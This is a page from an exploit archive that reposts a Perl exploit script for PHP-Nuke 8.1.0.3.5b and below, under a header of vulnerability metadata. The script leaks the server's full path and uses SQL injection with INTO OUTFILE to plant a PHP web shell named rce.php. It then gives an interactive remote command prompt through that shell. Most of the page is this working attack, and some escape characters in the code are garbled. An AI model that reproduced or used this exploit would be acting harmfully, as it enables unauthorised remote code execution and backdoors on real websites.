Advertisement






PHP-Nukes 8.1.0.3.5b and below remote command execution

CVE Category Price Severity
N/A (No CVE assigned) CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Price not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2010-07-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010070069

Below is a copy:

# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #[email protected] | #[email protected]
 
#   You will remember, Watson, how the dreadful business of the
#       Abernetty family was first brought to my notice by the depth which the
#       parsley had sunk into the butter upon a hot day.
#                                               -- Sherlock Holmes
 
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
 
sub Nuke::Usage {
    print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploitn";
    print " ------------------------------------------------------ n";
    print " * USAGE:                                             *n";
    print " * cd [Local Disk]:\                                  *n";
    print " * perl name_exploit.pl [host] [username] [password]  *n";
    print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <-  *n";
    print " ------------------------------------------------------ n";
    print " *             Powered By Dante90 & yawn              *n";
    print " *                  www.unitx.net                  *n";
    print " ------------------------------------------------------ n";
}
 
#VARS
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
my $host = shift || die;
my $cmd;
my $shell = "<?php echo system($_GET["cmd"]); ?>"; # Change Here to
Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS
sub Full_Path_Disclosure() {
    my $Get = $request->get($host.'themes/NukeNews/theme.php');
    if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) {
        return $1;
    } else {
        return "failed";
    }
}
 
print " * Getting Full Pathn";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
$path =~ s/themes(/|\)NukeNews(/|\)theme.php//g;
print " * Full Path Found: $pathn";
if ($path =~ m/\/) {
    $path =~ s/\/\\\\/g;
}
print " * Injecting Shell To $hostn";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
    {
        check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM
`nuke_authors` INTO OUTFILE '$path"."rce.php",
    },
    Referer => $host."index.php");
print " * Injecting Successfully Completedn";
print " * Shell now available on $host"."rce.phpn";
print " * Connecting to remote shelln";
sleep(4);
print " * Connected.. Type "quit" to quitn";
while() {
        print "* root@backdoor ~$ ";
        $cmd = <>;
        chomp($cmd);
        last if $cmd eq "quit";
        $req2 = $request->get($host."/rce.php?cmd=".$cmd);
        print $req2->content."n";
}



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.